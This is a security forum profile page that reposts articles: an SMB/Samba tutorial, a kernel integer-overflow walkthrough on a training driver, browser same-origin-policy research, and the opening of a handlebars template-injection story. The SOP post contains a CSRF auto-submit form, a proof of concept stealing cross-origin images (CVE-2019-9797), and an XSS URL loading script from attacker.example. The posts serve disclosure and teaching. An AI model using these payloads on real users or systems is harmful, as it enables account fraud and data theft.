Jump to content

Nytro

Administrators
  • Posts

    18740
  • Joined

  • Last visited

  • Days Won

    711

Everything posted by Nytro

  1. Make Redirection Evil Again:URLParser Issues in OAuth XianboWang1, Wing CheongLau1, Ronghai Yang1,2, andShangchengShi11 The Chinese University of Hong Kong,2Sangfor Technologies Co., Ltd Download: https://i.blackhat.com/asia-19/Fri-March-29/bh-asia-Wang-Make-Redirection-Evil-Again-wp.pdf
  2. Nytro

    Vremea

    curl http://wttr.in
  3. Poti executa JS?
  4. Da, mov (dar si alte instructiuni) sunt Turing complete.
  5. Network Basics for Hackers: Server Message Block (SMB) and Samba March 4, 2019 | OTW Welcome back, my aspiring cyber warriors! This series is intended to provide the aspiring cyber warrior with all the information you need to function in cyber security from a network perspective, much like my "Linux Basics for Hackers" is for Linux. In this tutorial we will address Server Message Block or SMB. Although most people have heard the acronym, few really understand this key protocol. It may be the most impenetrable and least understood of the communication protocols, but so critical to the smooth functioning of your network and it's security. What is SMB? Server Message Block (SMB) is an application layer (layer 7) protocol that is widely used for file, port, named pipe and printer sharing. It is a client-server communication protocol. It enables users and applications to share resources across their LAN. This means that if one system has a file that is needed by another system, SMB enables the user to share their files with other users. In addition, SMB can be used to share a printer over the Local Area Network (LAN). SMB over TCP/IP uses port 445. SMB is a client-server, request response protocol. The diagram below illustrates the request-response nature of this protocol. Clients connect to servers via TCP/IP or NetBIOS. Once the two have established a connection, the clients can send commands to access shares, read and write files and access printers. In general, SMB enables the client to do everything they normally do on their system, but over the network. SMB was first developed by IBM in the 1980's (the dominant computer company from the 1950's through the mid 1990's) and then adopted and adapted by Microsoft for its Windows operating system CIFS The term CIFS and SMB are often confused by the novice and cyber security professional alike. CIFS stands for “Common Internet File System.” CIFS is a dialect or a form of of SMB. That is, CIFS is a particular implementation of the Server Message Block protocol. It was developed by Microsoft to be used on early Microsoft operating systems. CIFS is now generally considered obsolete as it has been supplanted by more modern implementations of SMB including SMB 2.0 (introduced in 2006 with Windows Vista) and SMB 3.0 (introduced with Windows 8 and Server 2012). Vulnerabilities SMB in Windows and Samba in Linux/Unix systems (see below) has been major source of critical vulnerabilities on both these operating systems in the past and will likely will continue to be a source of critical vulnerabilities in the future. Two of the most critical Windows vulnerabilities over the last decade or so, have been SMB vulnerabilities. These include MS08-067 and more recently, the EternalBlue exploit developed by the NSA. In both cases, these exploits enabled the attacker to send specially crafted packets to SMB and execute remote code with system privileges on the target system. In other words, armed with these exploits, the attacker could take over any system and control everything on it. For a detailed look at the EternalBlue exploit against Windows 7 by Metasploit, see my tutorial here. In addition, using Metasploit, an attacker can set up a fake SMB server to capture credentials. In addition, the Linux/Unix implementation of SMB, Samba, has had its own problems as well. Although far from a complete list of vulnerabilities and exploits, when we search Metasploit 5 for smb exploits we find the considerable list below. Note the highlighted infamous MS08-067 exploit responsible for the compromising of millions of Windows Server 2003, Windows XP and earlier systems. Near the bottom of the list you can find the NSA's EternalBlue exploit (MS17-010) that the NSA used to compromise untold number of systems and then--after its release by Shadowbrokers--was used by such ransomware as Petya and WannaCry. In the Network Forensics section here at Hackers-Arise, I have detailed packet-level analysis of the EternalBlue exploit against SMB on a Windows 7 system. Samba While SMB was originally developed by IBM and then adopted by Microsoft, Samba was developed to mimick a Windows server on a Linux/UNIX system. This enables Linux/UNIX systems to share resources with Windows systems as if they were Windows systems. Sometimes the best way to understand a protocol or system is to simply to install and implement it yourself. Here, we will install, configure and implement Samba on a Linux system. As usual, I will be using Kali--which is built upon Debian-- for demonstration purposes, but this should work on any Debian system including Ubuntu and usually any of the vast variety of *NIX systems. Step #1: Download and Install Samba The first step, if not already installed, is to download and install Samba. It is in most repositories, so simply enter the command; kali > apt-get install samba Step #2: Start Samba Once Samba has been downloaded and installed we need to start Samba. Samba is a service in Linux and like any service, we can start it with the service command. kali > service smbd start Note that the service is not called "Samba" but rather smbd or smb daemon. Step #3: Configure Samba Like nearly every service or application in Linux, configuration can be done via simple text file. For Samba that text file is at /etc/samba/smb.conf. Let's open it with any text editor. kali > leafpad /etc/samba/smb.conf We can configure Samba on our system by simply adding the following lines to the end of our configuration file. In our example, we begin by; naming our share [HackersArise_share]; providing a comment to explain comment = Samba on Hackers-Arise; provide a path to our share path = /home/OTW/HackersArise_share; determine whether the share is read only read only = no; determine whether the share is browsable browsable = yes. Note that the share is in the user's home directory (/home/OTW/HackersArise_share) and we have the option to make the share "read only". Step #4: Creating a share Now that we have configured Samba, we need to create a share. A "share" is simply a directory and it's contents that we make available to other users and applications on the network. The first step is to create a directory using mkdir in the home directory of the user. In this case, we will create a directory for user OTW called HackersArise_share. kali > mkdir /home/OTW/HackersArise_share Once that directory has been created, we need to give every user access to it by changing its permissions with the chmod command. kali > chmod 777 /home/OTW/HackersArise_share Now, we need to restart Samba to capture the changes to our configuration file and our new share. kali > service smbd restart With the share created, from any Windows machine on the network you can access that share by simply navigating via the File Explorer to the share by entering the IP address and the name of the share, such as; \\192.168.1.101\HackersArise_share Conclusion SMB is a critical protocol on most computer systems for file, port, printer and named pipe sharing. It is little understood and little appreciated by most cyber security professionals, but it can be critical vulnerability on these systems as shown by MS08-067 and the NSA's EternalBlue. The better we understand these protocols, the better we protect our systems from attack and compromise. Sursa: https://www.hackers-arise.com/single-post/2019/03/04/Network-Basics-for-Hackers-Server-Message-Block-SMB
  6. Windows Kernel Exploitation Part 3: Integer Overflow By Himanshu Khokhar On April 4, 2019 In Exploit Development, Integer Overflow, Kernel Exploitation, Reverse Engineering Introduction Welcome to the third part of Windows Kernel Exploitation series. In this part, we are going to exploit integer overflow in the HackSysExtremeVulnerableDriver. What exactly is an integer overflow? For those who do not know about integer overflows, you might be thinking how an integer can overflow? Well, the actual integer does not overflow. CPU stores integers in fixed size memory allocations (we are not talking about heap or alike here). If you are familiar with C/C++ programming language or similar languages, you might recall data types and how each data type has specific fixed size. On most machines and OSes, char is 1 byte and int is 4 bytes long. What that means is a char data type can hold values that are 8-bits in size, ranging from 0 to 255 or in case of signed values, -128 to 127. Same goes for integers, on machines where int is 4-bytes in size, it can hold values from 0 to 232 – 1 (in case of unsigned values). Now, let us consider we are using an unsigned int whose largest value can be 232 – 1 or 0xFFFFFFFF. What happens when you add 1 to this? Since all the 32 bits are set to one, adding one will make it a 33-bit value but since the storage can hold only 32 bits, those 32 bits are set to 0. When doing operations, CPU generally loads the number in a 32-bit register (talking about x86 here) and adding 1 will set Carry Flag and the register holds value 0 as all 32 bits are now 0. Now, if there is a size check whether the value is greater than, let’s say 10, then the check will fail but if the size restriction was not there, then the comparison operation would return true. To understand it in more detail, let us have a look the vulnerability and see how we can exploit integer overflow issue in HEVD to gain code execution in Windows Kernel. Vulnerability Now we have got it cleared, let us have a look at the vulnerable code (function TriggerIntegerOverflow located in IntegerOverflow.c). Initially, the function creates an array of ULONGs which can hold 512 member elements (BufferSize is set to 512 in common.h header file). Vulnerable function in IntegerOverflow.c The kernel then checks if the buffer resides in user land and then it prints some information for us. Pretty helpful. Once that has been done, the kernel then checks whether the size of the data (along with the size of Terminator, which is 4 bytes) is more than that of KernelBuffer. If it is, then it exits without copying the user-land buffer in kernel-land buffer. Size checks But, if that is not the case, then it goes ahead, and copies data to the kernel buffer. Another thing to note here is that IF it encounters BufferTerminator in the user-land buffer, it stops copying and moves ahead. So, we need to put the BufferTerminator at the end of our user mode buffer. Copying user-mode data to kernel-mode function stack The Overflow The problem in Line 100 of IntegerOverflow.c is that if we supply the size parameter as 0xFFFFFFFC and then it adds the size of BufferTerminator (which is 4 bytes), the effective size becomes – 0xFFFFFFFC + 4 = 0x00000000 which is less than the size of KernelBuffer and therefore, we pass the check of the data size and move to copying of the buffer to kernel mode. Verifying the bug Now, to verify this, we are going to send our buffer to the HEVD but passing 0xFFFFFFFC as the size of the buffer. For now, we will not place a huge buffer and crash the kernel, rather we will just send a small buffer and confirm. PoC of triggering Integer Overflow Since we know the buffer is of 512 ULONGs, we will just send this data and see what the kernel does. Note: Here, the focus is on the 4th parameter of DeviceIoControl rather than on the actual data. Finally, send this buffer to HEVD and see what happens. Successfully triggered Integer Overflow As you can see in the picture, the UserBuffer Size says 0xFFFFFFFC, but we still managed to bypass the size validity check and triggered integer overflow. We confirmed that by putting 0xFFFFFFFC, we can bypass the check size, now all it remains is to put a pattern (a unique pattern) after the UserBuffer and put the terminator after that to find saved return pointer overwrite. If you do not know how to do that, please read Part 1 of this series where I have shown how to do this. Let us move ahead and exploit it. Exploiting the Overflow All now remains is to use overwrite the saved return address with the TokenStealingPayloadWin7 shellcode provided in HEVD and you are done. Note: You may need to modify the shellcode a bit to save it from crashing. This is your homework. Getting the shell Let us first verify whether I am a regular user or not. Regular User As it can be seen, I am just a regular user. After we run our exploit, I become nt authority/system. Successful exploitation of Integer Overflow That’s for this this part folks, see you in next part. You can find whole code in my code repo here. References HackSysTeam FuzzySecurity Sursa: https://pwnrip.com/windows-kernel-exploitation-part-3-integer-overflow/
  7. Same-Origin Policy: From birth until today In this blog post I will talk about Cross-Origin Resource Sharing (CORS) between sites on different domains, and how the web browser’s Same Origin Policy is meant to facilitate CORS in a safe way. I will present data on cross-origin behaviour of various versions of four major browsers, dating back to 2004. I will also talk about recent security bugs (CVE-2018-18511 and CVE-2019-9797) I discovered in the latest versions of Firefox, Chrome and Opera which allows stealing sensitive images via Cross-Site Request Forgery (CSRF). Overview Motivation An attack… … and the defence What is CORS, SOP, preflight checks and all this jibberish you’re talking about? CORS headers Why GET should be “safe” SOP behaviour across browsers Browsers tested Test setup Server CORS modes Cross-origin request methods Requested targets Results Implications Tools used References Motivation An attack… Cross-Site Request Forgery (CSRF or XSRF) is arguably one of the most common issues we encounter during web app testing, and one of the trickiest to protect against. The attack goes as follows: A malicious user, Eve, has an account with bank.example with account number Eve wants to steal money from another customer, Bob, and knows that the HTTP request Bob would send to bank.example to transfer $10000 to Eve is as follows: POST /transfer.php HTTP/1.1 Host: bank.example Cookie: PHPSESSID={Bob's secret session cookie} fromAcc=primary&toAcc=123456&amount=10000 Figure 1: An HTTP request vulnerable to CSRF So she sets up a page at https://evil-eve.example/how-to-delete-yourself-from-the-internet with the following contents: <!DOCTYPE html> <html> <head> <script> document.addEventListener("DOMContentLoaded", function() { document.getElementById("gimmeTheMoney").submit(); }); </script> </head> <body> <form id="gimmeTheMoney" method="POST" action="https://bank.example/transfer.php"> <input type="hidden" name="fromAcc" value="primary"> <input type="hidden" name="toAcc" value="123456"> <input type="hidden" name="amount" value="10000"> </form> </body> </html> Figure 2: An HTML page which submits the request in Figure 1 The HTML form on the page corresponds to the POST request shown above. When Bob visits Eve’s page, in the hope of erasing past mistakes, the form is automatically submitted and includes Bob’s PHPSESSID cookie (if he has logged in to the bank’s website recently), performing the money transfer. … and the defence There are a few ways websites can protect their users from this type of attack. This article is not meant to explain all of them in detail; OWASP’s cheatsheet does a good job at that, albeit on a technical level. In short, there are two main techniques websites can use to counter CSRF: Relying on the browser... ...and its Same Origin Policy (SOP); this is the scenario I investigate in this article ...by setting cookies with the SameSite flag Using dynamic pages and generating one-time tokens for each action on the page, every time the page is reloaded. Option 1.1 only works if the application refuses to accept requests that are sent via HTML forms (i.e. requests with content type application/x-www-form-urlencoded, multipart/form-data or text/plain, and no non-standard HTTP headers). This is because the same origin policy only applies to actions taken by JavaScript (and other browser-scripting languages). It does not apply to old-school HTML forms, so browsers can’t do anything to block HTML form submissions from untrusted domains. Requests containing JSON data or non-standard headers (e.g. X-Requested-With) on the other hand can only be sent via JavaScript. The browser needs to send a so-called “pre-flight check”, and unless the check determines that the target domain (e.g. bank.example) explicitly allows such requests from the origin domain (e.g. evil-eve.example), the browser doesn’t send the actual request. bank.example needs to respond with appropriate HTTP headers for the same origin policy to be effective; see section CORS headers. Option 1.2 will prevent attacks like the one described, but it is supported only in modern browsers. Furthermore it will not prevent unauthenticated CSRF attacks to websites which are on an internal network or rely on IP whitelisting for authorization. The method relies on the legitimate server (bank.example) instructing the browser to only include the session cookie if the request is coming from the same origin, i.e. https://bank.example. The browser respects this during HTML form submissions too. This way, money transfers on bank.example work correctly, but the form hosted on evil-eve.example will not include Bob’s session cookie when submitted, and hence will prevent the transfer from occurring. Option 2 can be used to prevent CSRF attacks that rely on any HTTP method and submission type (GET or POST; HTML forms or JavaScript), but has many pitfalls: care needs to be taken to issue, require and validate the token for every request; the server still needs to implement an appropriate CORS policy to prevent malicious sites from learning the token; the token needs to be generated in a cryptographically secure random way, be long enough, short-lived and tied to the current user’s session (i.e. invalidated upon Log out). What is CORS, SOP, preflight checks and all this jibberish you’re talking about? An origin is defined by a schema (or protocol), hostname and port number, e.g. https://bank.example:443. The standard says two origins are considered the same if and only if all of the below conditions are met: the protocol for both origins is the same, e.g. https the hostname for both origins is the same, e.g. bank.example; the hostname can be only partially-qualified (e.g. localhost); it can also be an IP address 1 the port number for both origins is the same; the port number does not have to be explicitly given, i.e. https://bank.example:443 and https://bank.example are the same origin since 443 is the default port number for https Requests sent from one origin to a different one are called cross-origin requests. Historically browsers flat out refused to allow JavaScript to make cross-origin requests. This was done for security reasons, namely to prevent CSRF. As web applications became more complicated and interconnected the need for JavaScript-initiated cross-origin requests became evident. To enable cross-origin requests in a secure manner the standard for Cross-Origin Resource Sharing (CORS) was introduced. CORS says that when making cross-origin requests browsers must include the Origin header and not include cookies unless explicitly requested, for example if the request had set XMLHttpRequest.withCredentials to true. Additionally, CORS defines the concept of a simple request. A request is simple if all of these are true: the method is GET, HEAD or POST the request does not include non-standard headers it submits content of type application/x-www-form-urlencoded, multipart/form-data or text/plain (those that can be submitted via HTML forms) If the request is simple, the browser can send the request to the external origin, but if the server’s CORS policy does not allow the request the browser must not allow JavaScript to read the response. If the request is not simple, the browser must do a preflight check (OPTIONS HTTP method) with appropriate CORS headers. If the server’s CORS policy does not explicitly allow the request, then it must refuse to send the actual request. Servers receiving cross-origin requests must respond with appropriate CORS headers indicating whether the request is allowed; this is done irrespective of whether the request is a preflight check (OPTIONS) or the actual request (e.g. GET). CORS headers If no preflight check is done browsers are only required to send the Origin header. Otherwise the preflight check should have an empty body, include no cookies, and include the Access-Control-Request-Method header with the method of the request to be made, e.g. GET. Additionally, if non-standard headers are to be included, it must include these as a comma-separated list in the Access-Control-Request-Headers header. Servers should respond to a cross-origin request with the following headers: Access-Control-Allow-Origin: either a single allowed origin or a wildcard (*) indicating all origins; servers may change the value depending on the Origin of the request Access-Control-Allow-Credentials: indicating if the browser is allowed to send cookies with the request; if omitted, defaults to false; cannot be true if Access-Control-Allow-Origin is * Access-Control-Allow-Headers: comma-separated list of allowed headers A picture table says a thousand words: Request is simple Server allows Browsers must Origin Credentials Do preflight Give JavaScript access Yes {not as requested} No No No Yes * No Yes, if no cookies needed Yes {as requested} No Yes Yes No {not as requested} No Yes No Yes * No Yes, if no cookies needed Yes {as requested} No Yes Yes Table 1: The CORS standard Why GET should be “safe” The preflight checks by browsers and their SOP make sure that requests which may modify sensitive data, such as DELETE, PUT, PATCH and non-simple POST requests will never be sent to the server from a third-party domain, unless the server explicitly allows such a request from this particular third-party domain. You may then wonder why browsers don’t apply the same rules to GET requests. After all, some servers implement, or at least allow, sensitive data operations using GET requests. Take this hypothetical example: a Like button on a social media site (let’s call it FakeBook) which is placed under a page and links to https://fakebook.example/like?page=HTTPSEverywhere . When a user clicks on the button in order to like the page, the browser will send a GET request to that URL, and will include the user’s session cookie, so that the server knows which user has liked this page. This is a classic CSRF which the browser can’t do anything about. Bob, who is logged in to his FakeBook account, goes to windywellington.example to check the weather. windywellington.example is actually a malicious site which wants to collect likes on FakeBook and redirects Bob back to https://fakebook.example/like?page=WindyWellington. As far as the browser is concerned there is nothing wrong with that, as there are many legitimate cases which use redirection to third-party domains. And as far as fakebook.example is concerned Bob may have clicked that Like button himself. Blocking external Referer or using tokens won’t work if Like buttons are to be integrated with other sites. So what could SOP do about GET requests? Pretty much nothing. Browsers are not supposed to block redirects by default. And there are many other ways windywellington.example can trick the browser into requesting a resource from fakebook.example, not limited to: embedding https://fakebook.example/like?page=WindyWellington in an iframe 2 loading it as a script, image or any other resource using an HTML form with the GET method In none of those cases can either the browser or fakebook.example detect the malicious intent. This is why the HTTP standard clearly states that GET requests should always be “safe”, i.e. never change web application data. And this is also the reason why browsers are not required to submit a preflight check for GET requests. Unfortunately many websites neglect this and fall victim to CSRF attacks like the hypothetical Like button scenario. (note: facebook.com is not vulnerable in this way). SOP behaviour across browsers Browsers tested I tested 17 versions of Opera, 16 versions of Firefox, 40 versions of Chrome, 39 versions of Internet Explorer, and one version of Microsoft Edge. A total of 113 browsers, dating back to 2004. All browsers were tested using their default settings. Full list of browsers tested and sources used I tested one version per year as far back as it supports : Versions and versions can be downloaded from the official Opera archives. Versions pre 11.00 can be found on the third-party site . I do not take responsibility for any loss as a result of installing software from unofficial sources. I ran the versions in question on a virtual machine. I tested roughly one version per year (except version 1.5 from 2005, due to technical issues running the binary) as far back as version 1.0: All versions of Firefox can be downloaded from the . I used the ready Windows builds from Chromium's and builds archive. I did not test stable releases in particular, as the build archives do not indicate which version a build corresponds to. I instead selected one out of roughly every 2000 builds, from the oldest to the newest. The date shown below is approximate as it corresponds to the release date of the corresponding stable major version: I wrote a which can fetch a list of all builds for a platform (e.g. ) or download the portable version of a given build (e.g. ). I tested every major version of Internet Explorer as far back as it supports . IE11 on Windows 10 behaves differently to IE11 on older Windows versions, even with the latest patches applied to them. I tested three versions of IE11 on Windows 10, one on Windows 7, and all 31 versions of IE11 on Windows 8.1 (initial + ) Virtual machines for various platforms, including VMware Fusion, with IE versions 8 to 11 can be downloaded from . Virtual machines for Microsoft Hyper-V can be downloaded from . These can be imported into VirtualBox as well, and from there exported to OVF format for VMware. I tested only one recent version of Microsoft Edge: A virtual machine for various platforms, including VMware Fusion, with the above Edge version can be downloaded from . Test setup I wrote an HTTP server based on Python’s http.server, and some supporting HTML/JavaScript. The server implements a dummy login and requires a cookie issued by it for requests to any file under /secret/. The CORS headers to be included in the server’s response to each request are taken from URL parameters in that request. Supported parameters: creds: should be 0 or 1 requesting Access-Control-Allow-Credentials: true or false origin: specifies Access-Control-Allow-Origin; it is taken literally unless it is {ECHO}, then it is taken from the Origin header in the request. /demos/sop/getSecret.html will prompt for the target origin (should be different to the one it’s loaded from), then log in to it, and fetch https://<target_host>/secret/<secret file>?origin=...&creds=... requesting each one of the five CORS combinations described below; and it will do so using each the eight cross-origin request methods described below. Server CORS modes Each request was submitted 5 times: each time the server was configured to reply with one of the five Access-Control-Allow-* header combinations: Origin Credentials No * No Yes {as requested} No Yes Table 2: The combinations of CORS server response headers tested where “{as requested}” means the server specifically allowed the origin the request came from, “Yes” indicates true value of the header, “No”—false Cross-origin request methods Each browser was tested with the following 8 cross-origin request methods: Method Body Content-Type or embedded as Request is simple Require cookies? Response data taken from GET via XHR — Yes Yes responseText POST via XHR application/json No Yes responseText Sample code for XMLHttpRequest GET via iFrame3 N/A Yes No contentDocument.body.innerHTML Sample code for iframe GET via object3 text/plain Yes No contentDocument.body.innerHTML Sample code for object GET via 2D canvas N/A Yes Yes toDataURL() No Sample code for 2D canvas GET via bitmap canvas N/A Yes Yes toDataURL() No Sample code for bitmap canvas Table 3: The cross-origin request and data exfiltration methods tested Requested targets Where the request method used a canvas the “secret” file was an image. Otherwise the file was a plain text file. Each test was done twice: once to an origin with a different hostname (IP address of a different interface on the same machine), and once to an origin with the same hostname/IP address but different port number. This makes for a total of 8 × 5 × 2 = 80 tests per browser. Results Below is a summary of those browsers which send the request and/or allow JavaScript to read the response when they shouldn’t. For the full list of every request, see the current result tables for cross-origin requests to different hostnames and same hostnames/different ports. When target origin differs by hostname When the target origin had a different hostname, most browsers were either compliant, or forbid the request, which is the safe fallback if CORS is not supported. A notable exception are the currently latest versions of Chrome, Firefox and Opera, which allow JavaScript to read so-called “tainted” canvases. These are canvases rendered from an image which has not been loaded for cross-origin use, i.e. no crossorigin attribute was given. I discovered the bug (CVE-2018-18511) while doing this research and reported it to Google and Mozilla. In addition, a few very old versions of Chrome do not apply the CORS policy to XMLHttpRequests. (In this and in any following tables, the highlighted cells indicate behaviour that does not conform to the specification). Browsers Methods Server allowed Browser did Origin Credentials Preflight for POST Give JavaScript access Chrome 67.0 Chrome 69.0 Chrome 71.0 Chrome 72.0 Chrome 74.0 Firefox 65.0 Opera 56.0 GET via bitmap canvas (no CORS) No No Yes * No Yes {as requested} No Yes Yes Chrome 2.0.165.0 GET via XHR POST via XHR No No No * No Yes Yes {as requested} No Yes Yes Chrome 2.0.173.0 GET via XHR POST via XHR No Yes No * No Yes Yes {as requested} No Yes Yes Table 4: Browsers with dangerous SOP policy for origins differing by hostname When target origin differs only by port number In addition to the vulnerable browsers listed in Table 4, when the target origin differed only in port number, all versions of Internet Explorer and Edge including the latest ones, had an unsafe SOP policy. Interestingly, Edge allows exporting of tainted bitmap canvases only in this case, when the origins are on the same host. Browsers Methods Server allowed Browser did Origin Credentials Preflight for POST Give JavaScript access Internet Explorer 11 (<= Windows 8.1) Internet Explorer 10 Internet Explorer 9 Internet Explorer 8 Opera 9.00 GET via XHR POST via XHR No No Yes * No Yes {as requested} No Yes Yes Chrome 2.0.165.0 GET via XHR POST via XHR No No No * No Yes Yes {as requested} No Yes Yes Chrome 2.0.173.0 GET via XHR POST via XHR No Yes No * No Yes Yes {as requested} No Yes Yes Microsoft Edge 42 Internet Explorer 11 Internet Explorer 10 Internet Explorer 9 Internet Explorer 8 Internet Explorer 7 GET via iFrame No No Yes * No Yes {as requested} No Yes Yes Microsoft Edge 42 Internet Explorer 11 Internet Explorer 10 Internet Explorer 9 GET via object No No Yes * No Yes {as requested} No Yes Yes Chrome 67.0 Chrome 69.0 Chrome 71.0 Chrome 72.0 Chrome 74.0 Firefox 65.0 Opera 56.0 Microsoft Edge 42 Internet Explorer 11 Internet Explorer 10 Internet Explorer 9 Opera 9.60 Opera 9.20 Opera 9.00 GET via bitmap canvas (no CORS) No No Yes * No Yes {as requested} No Yes Yes Internet Explorer 11 Internet Explorer 10 Internet Explorer 9 Opera 9.60 Opera 9.20 Opera 9.00 GET via 2D canvas (CORS) No No Yes * No Yes {as requested} No Yes Yes Table 5: Browsers with dangerous SOP policy for origins differing by port number only Implications There are two main issues to discuss here. Issue 1: Exporting of tainted canvases Sometime in 2018 a bug was introduced in Chrome, Firefox as well as Opera, which allowed rendering any image to a bitmap canvas and exporting it. This is a serious issue since the browser sends the cookies it has for a domain when loading images from that domain. For example, if a user, while logged in to their account at bank.example, visits an attacker’s page, the page can steal any sensitive images the user has access to. All the attacker needs is the URL of the image. The image can be anything—from a personal photo or a scanned document, to the QR code for a two factor-authentication secret. It is an example of cross-site request forgery where it was up to the browser, and not the server, to prevent it. Google didn’t make fixing the issue a priority as it was not exploitable due to another bug in Chrome: toDataURL() and toBlob() give a generic transparent image for bitmap canvases. They did eventually fix it, and subsequently the other bug, which was giving a transparent image for a bitmap context. Mozilla fixed the bug within days and pushed an update. Days after that I discovered an alternative way (CVE-2019-9797) of getting the image: again by converting it to an ImageBitmap, but then rendering it in a 2D canvas instead of a bitmap canvas: <html><body> <script charset="utf-8"> function getData() { createImageBitmap(this, 0, 0, this.naturalWidth, this.naturalHeight).then(function(bmap) { var can = document.createElement('canvas'); // mfsa2019-04 fixed this // -------------------------- // var ctx = can.getContext('bitmaprenderer'); // ctx.transferFromImageBitmap(bmap); // -------------------------- // but not this var ctx = can.getContext('2d'); ctx.drawImage(bmap, 0, 0); document.getElementById('result').textContent = can.toDataURL(); var img = document.getElementById('result_render'); img.src = can.toDataURL(); document.body.appendChild(img); }); } </script> <img style="visibility: hidden" src="https://duckduckgo.com/assets/logo_homepage_mobile.normal.v107.png" onload="getData.call(this)"/> <br/><textarea readonly style="width:100%;height:10em" id="result"></textarea> <br/>Re-rendered image: <br/><img id="result_render"></textarea> </body></html> Mozilla were again quick to fix it. The fix made it into the stable branch on April 1st. Chrome is not vulnerable to this version of the exploit. Issue 2: IE and Edge’s same-origin policy when it comes to origins on the same host It is clear that Internet Explorer and Edge do not consider origins on the same host but different ports distinct, at least not as distinct as origins with different hostnames. This is not a new issue, or an accidental neglect by Microsoft. The Mozilla Developer Guide is quite clear on the fact that: Internet Explorer has two major exceptions to the same-origin policy: Trust Zones: If both domains are in the highly trusted zone (e.g. corporate intranet domains), then the same-origin limitations are not applied. Port: IE doesn’t include port into same-origin checks. Therefore, https://company.com:81/index.html and https://company.com/index.html are considered the same origin and no restrictions are applied. It also clearly points out that: These exceptions are nonstandard and unsupported in any other browser. The behaviour of modern Internet Explorer and Edge is striking for several reasons: The changes introduced for Windows 10 do improve the security of IE, but have been applied inconsistently and insufficiently: They are not available for older Windows versions, even though security updates are still being issued for them. They close the loophole in XMLHttpRequest, but still allow cross-origin access via iframe; data from another origin can also be stolen using object. It clearly violates the standard which has been set long ago, and which all other browsers conform to, and conform to for a good reason. I do not know the reasoning behind their same origin policy, but the implications are not negligible. We often see multiple HTTP services on the same host. Usually one is a standard public site (on ports 80 and 443), another one may be an administrative interface, not accessible publicly. Treating these as a single origin exposes every service on the host to attacks should even one of them be compromised. Consider a hypothetical example: a simple public website, which holds no sensitive data, nor implements authentication. It is likely that not a lot of attention would be paid to its secure implementation as it does not appear to be a valuable target for attackers. Let’s say a page on the site, /vulnerable.html, is vulnerable to a reflected Cross-Site Scripting (XSS) attack. An attacker can trick the developer of the site into visiting the following link http://localhost/vulnerable.html?search=<script%20src%3d"%2f%2fattacker.example%2fevil.js"><%2fscript> The vulnerable page will reflect the search parameter and in this way load a script from http://attacker.example/evil.js. The JavaScript will execute in the context of the page, localhost, as if it has been hosted on the site. Any requests made by it will come from origin http://localhost. Imagine there is a sensitive administrative panel on the same host, port 8080, which is not accessible from the public network, and does not allow cross-origin requests. If the developer who’s fallen victim to the reflected XSS is using Internet Explorer or Edge, then evil.js from attacker.example will have full access to the panel. In particular: if the developer is not logged in to the admin panel: it may attempt to brute force accounts on the administrative panel if the developer is logged in to the admin panel: it can get any data from it or take any action at the level of privilege of the developer I leave it to the reader to reach their conclusion. Mine would be “do not use IE or Edge”. Tools used My (not so) simple (anymore) HTTP server, based on Python’s simple HTTP server https://github.com/aayla-secura/mixnmatchttp/tree/master/demos/ https://pypi.org/project/mixnmatchttp/ VMware Fusion, for running all of the browsers https://www.vmware.com/products/fusion.html Official Microsoft virtual machines https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ References OWASP’s CSRF prevention cheatsheet https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet The Web Origin Concept https://tools.ietf.org/html/rfc6454 The Cross-origin resource sharing (CORS) standard https://www.w3.org/TR/cors/ The HTTP standard https://tools.ietf.org/html/rfc7231#section-4.2.1 Simple HTTP requests https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#Simple_requests If however it is a hostname, the browser doesn’t make sure it resolves to the same IP address during different requests; see DNS Rebinding attack ↩ Even if fakebook.example prevents this using X-Frame-Options, the GET request is already sent ↩ iframe and object don’t support CORS, so the browser should always refuse access, even if the server would allow a GET for this resource. ↩ ↩2 Written by Alex Nikolova (@AaylaSecura1138) Security Consultant at Aura Information Security. Sursa: https://research.aurainfosec.io/same-origin-policy/
  8. Handlebars template injection and RCE in a Shopify app April 04, 2019 TL;DR We found a zero-day within a JavaScript template library called handlebars and used it to get Remote Code Execution in the Shopify Return Magic app. The Story: In October 2018, Shopify organized the HackerOne event "H1-514" to which some specific researchers were invited and I was one of them. Some of the Shopify apps that were in scope included an application called "Return Magic" that would automate the whole return process when a customer wants to return a product that they already purchased through a Shopify store. Looking at the application, I found that it has a feature called Email WorkFlow where shop owners can customize the email message sent to users once they return a product. Users could use variables in their template such as {{order.number}} , {{email}} ..etc. I decided to test this feature for Server Side Template injection and entered {{this}} {{self}} then sent a test email to myself and the email had [object Object] within it which immediately attracted my attention. So I spent a lot of time trying to find out what the template engine was, I searched for popular NodeJs templates and thought the template engine was mustache (wrong), I kept looking for mustache template injection online but nothing came up as Mustache is supposed to be a logicless template engine with no ability to call functions which made no sense as I was able to call some Object attributes such as {{this.__proto__}} and even call functions such as {{this.constructor.constructor}} which is the Function constructor. I kept trying to send parameters to this.constructor.constructor() but failed. I decided that this was not vulnerable and moved on to look for more bugs. Then the fate decides that this bug needs to be found and I see a message from Shopify on the event slack channel asking researchers to submit their "almost bugs" so if someone found something and feels it's exploitable, they would send the bug to Shopify security team and if the team manages to exploit it the reporter will get paid as if they found it. Immediately I sent my submission explaining what I have found and at the impact section I wrote "Could be a Server Side template injection that can be used to take over the server ¯\_(ツ)_/¯". Two months passed and I got no response from Shopify regarding my "almost bug" submission, then I was invited to another hacking event in Bali hosted by Synack. There I met the Synack Red Team and after the Synack event has ended, I was supposed to travel back to Egypt, but only 3 hours before the flight I decided to extended my stay for three more days then fly from Bali to Japan where I was supposed to participate in the TrendMicro CTF competition with my CTF team. Some of the SRT also decided to extend their stay in Bali. One of those was Matias so I contacted him to hangout together. After swimming in the ocean and enjoying the beautiful nature of Bali, we went to a restaurant for dinner where Matias told me about a bug he found in a bug bounty program that had something to do with JavaScript sandbox escape so we spent all night missing with objects and constructors, but unfortunately we couldn't escape the sandbox. I couldn't take constructors out of my head and I remembered the template injection bug I found in Shopify. I looked at the HackerOne report and thought that the template can't be mustache so I installed mustache locally and when I parsed {{this}} with mustache it actually returns nothing which is not the case with the Shopify application. I searched again for popular NodeJs template engines and I found a bunch of them, I looked for those that used curly brackets {{ }} for template expressions and downloaded them locally, one of the libraries was handlebars and when I parsed {{this}} it returned [object Object] which is the same as the Shopify app. I looked at handlebars documentation and found out that it's also supposed to not have much logic to prevent template injection attacks. But knowing that I can access the function constructor I decided to give it a try and see how I can pass parameters to functions. After reading the documentation, I found out that in handlebars developers can register functions as helpers 